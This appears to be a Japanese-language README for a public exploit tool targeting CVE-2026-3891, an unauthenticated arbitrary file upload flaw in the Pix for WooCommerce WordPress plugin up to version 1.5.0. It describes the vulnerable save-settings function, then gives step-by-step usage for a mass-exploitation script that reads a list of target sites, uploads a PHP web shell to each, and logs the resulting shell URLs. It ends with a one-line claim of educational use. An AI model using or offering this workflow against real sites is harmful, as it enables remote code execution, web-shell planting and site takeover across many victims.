
Pix for WooCommerce <= 1.5.0 - 未認証の任意ファイルアップロード
Pix for WooCommerce <= 1.5.0 - 未認証の任意ファイルアップロード
WordPress 用プラグイン Pix for WooCommerce には、未認証の任意ファイルアップロード の脆弱性があります。原因は以下の通りです:
これは、1.5.0 までの全バージョン における lkn_pix_for_woocommerce_c6_save_settings 関数に存在します。
これにより、リモートの未認証攻撃者 が任意のファイルをアップロードでき、リモートコード実行 (RCE) につながります。
CVE-2026-38919.8 (Critical)CVE-2026-3891.py@Kxploitpip install requests rich
ファイルを作成:
list.txt
例:
http://example.com
https://target.com
victim-site.com
プロトコルが無い場合 → スクリプトが自動的に
http://を追加します
シェルファイルを同じディレクトリに配置:
shell.php
python3 CVE-2026-3891.py
スクリプトが次の項目を尋ねます:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
このプロジェクトは、教育目的および許可を得たセキュリティテスト専用 として提供されています。
Nxploited